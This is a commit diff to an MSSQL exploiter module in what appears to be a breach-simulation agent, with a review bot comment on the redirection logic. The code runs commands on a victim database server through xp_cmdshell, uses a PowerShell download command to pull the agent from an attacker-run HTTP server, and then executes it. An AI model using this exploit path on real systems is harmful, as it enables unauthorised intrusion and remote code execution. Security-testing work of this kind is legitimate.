Agent: Remove create_empty_payload_file() in MSSQLExploiter
Since the commands are no longer split up into 128-character chunks, it is simpler to overwrite an existing file using `>` than to create an empty file and append to it.
parent
ea980c4594
commit
7846a6cac1
|
@ -37,8 +37,7 @@ class MSSQLExploiter(HostExploiter):
|
|||
XP_CMDSHELL_COMMAND_START = "xp_cmdshell '"
|
||||
XP_CMDSHELL_COMMAND_END = "'"
|
||||
EXPLOIT_COMMAND_PREFIX = "<nul set /p="
|
||||
EXPLOIT_COMMAND_SUFFIX = ">>{payload_file_path}"
|
||||
CREATE_COMMAND_SUFFIX = ">{payload_file_path}"
|
||||
EXPLOIT_COMMAND_SUFFIX = ">{payload_file_path}"
|
||||
MONKEY_DOWNLOAD_COMMAND = (
|
||||
"powershell (new-object System.Net.WebClient)."
|
||||
"DownloadFile(^''{http_path}^'' , ^''{dst_path}^'')"
|
||||
|
@ -79,15 +78,11 @@ class MSSQLExploiter(HostExploiter):
|
|||
try:
|
||||
# Create dir for payload
|
||||
self.create_temp_dir()
|
||||
self.create_empty_payload_file()
|
||||
|
||||
http_thread = self.start_monkey_server(monkey_path_on_victim)
|
||||
self.upload_monkey(monkey_path_on_victim)
|
||||
MSSQLExploiter._stop_monkey_server(http_thread)
|
||||
|
||||
# Clear payload to pass in another command
|
||||
self.create_empty_payload_file()
|
||||
|
||||
self.run_monkey(monkey_path_on_victim)
|
||||
|
||||
self.remove_temp_dir()
|
||||
|
@ -116,14 +111,6 @@ class MSSQLExploiter(HostExploiter):
|
|||
)
|
||||
self.run_mssql_command(dir_creation_command)
|
||||
|
||||
def create_empty_payload_file(self):
|
||||
logger.debug(f"Creating an empty payload file: {self.payload_file_path}")
|
||||
suffix = MSSQLExploiter.CREATE_COMMAND_SUFFIX.format(
|
||||
payload_file_path=self.payload_file_path
|
||||
)
|
||||
tmp_file_creation_command = MSSQLLimitedSizePayload(command="NUL", suffix=suffix)
|
||||
self.run_mssql_command(tmp_file_creation_command)
|
||||
|
||||
def run_mssql_command(self, mssql_command):
|
||||
array_of_commands = mssql_command.split_into_array_of_smaller_payloads()
|
||||
if not array_of_commands:
|
||||
|
@ -182,7 +169,7 @@ class MSSQLExploiter(HostExploiter):
|
|||
monkey_args = build_monkey_commandline(
|
||||
self.host, self.current_depth - 1, monkey_path_on_victim
|
||||
)
|
||||
suffix = ">>{}".format(self.payload_file_path)
|
||||
suffix = ">{}".format(self.payload_file_path)
|
||||
prefix = MSSQLExploiter.EXPLOIT_COMMAND_PREFIX
|
||||
return MSSQLLimitedSizePayload(
|
||||
command="{} {} {}".format(monkey_path_on_victim, DROPPER_ARG, monkey_args),
|
||||
|
|
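Review bot: `suffix = ">{}".format(self.payload_file_path)` in the last hunk hard-codes the redirection string that the first hunk already defines as `EXPLOIT_COMMAND_SUFFIX = ">{payload_file_path}"`; using `suffix = MSSQLExploiter.EXPLOIT_COMMAND_SUFFIX.format(payload_file_path=self.payload_file_path)` keeps the operator defined in one place. That matters because the commit now depends on each payload reaching the victim as a single chunk: `run_mssql_command` in the third hunk still iterates over `split_into_array_of_smaller_payloads()`, and if that ever yields more than one piece, every `>` chunk truncates what the previous one wrote and the payload silently loses its head. A short comment on the constant would make the invariant visible, e.g. `# '>' overwrites the payload file, so each command must be sent as one chunk`. The method containing the last hunk starts and ends outside the hunk.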